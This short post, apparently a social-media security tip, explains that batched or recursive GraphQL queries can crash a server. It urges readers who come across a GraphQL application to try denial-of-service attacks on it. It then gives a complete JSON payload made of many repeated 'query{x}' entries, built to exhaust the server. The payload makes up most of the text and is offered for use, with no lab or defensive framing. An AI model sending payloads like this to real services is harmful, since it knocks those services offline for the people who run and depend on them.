Did you know you can trigger a Denial of Service by crashing the GraphQL server using recursive queries?

If you encounter an application that uses GraphQL, there are several simple (yet very effective) Denial of Service attacks that you can try

One of the payloads abuses the option to concatenate multiple queries into a single request

When the number of batched requests were expended, an exponential increase in response time was also observed, ultimately exhausting the server.

Payload

{"query":"query DoS{query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}}"}